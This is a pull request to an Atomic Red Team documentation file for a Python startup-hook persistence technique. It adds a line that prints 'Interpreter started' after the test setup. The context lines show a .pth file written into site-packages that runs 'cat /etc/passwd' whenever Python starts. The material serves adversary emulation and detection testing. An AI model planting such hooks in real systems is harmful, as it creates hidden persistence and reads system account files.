### PR TITLE
Add interpreter start message to atomic hook setup for Linux This is md file change

### DIFF
--- a/atomics/T1546.018/T1546.018.md
+++ b/atomics/T1546.018/T1546.018.md
@@ -110,6 +110,7 @@ echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
 $PYTHON_EXE -m venv "$TEMPDIR/env"
 SITE_PACKAGES=$("$TEMPDIR/env/bin/python" -c "import site; print(site.getsitepackages()[0])")
 echo "import sys, os; (not hasattr(sys, 'hook_run')) and (setattr(sys, 'hook_run', True) or os.system('cat /etc/passwd'))" > "$SITE_PACKAGES/atomic_hook.pth"
+"$TEMPDIR/env/bin/python" -c "print('Interpreter started')"
 ```
 
 #### Cleanup Commands:


### PR DESCRIPTION
Added a command to print 'Interpreter started' after setting up the Python environment.

**Details:**
Added a command to print 'Interpreter started' after setting up the Python environment.

**Testing:**
"$TEMPDIR/env/bin/python" -c "print('Interpreter started')"

**Associated Issues:**
<!-- Please link any issues that this pull request impacts or fixes. -->